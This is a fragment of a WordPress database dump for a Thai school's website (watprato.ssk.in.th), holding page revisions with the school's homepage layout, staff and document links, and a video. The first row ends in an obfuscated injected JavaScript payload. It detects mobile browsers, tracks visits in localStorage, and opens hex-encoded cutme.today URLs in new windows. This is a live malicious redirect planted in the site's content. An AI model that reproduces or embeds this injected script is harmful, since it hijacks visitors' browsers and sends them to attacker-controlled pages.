'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 14:11:51','2024-08-30 07:11:51','',19,'http://watprato.ssk.in.th/?p=342',0,'revision','',0),
(344,2,'2024-08-30 14:13:46','2024-08-30 07:13:46','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a 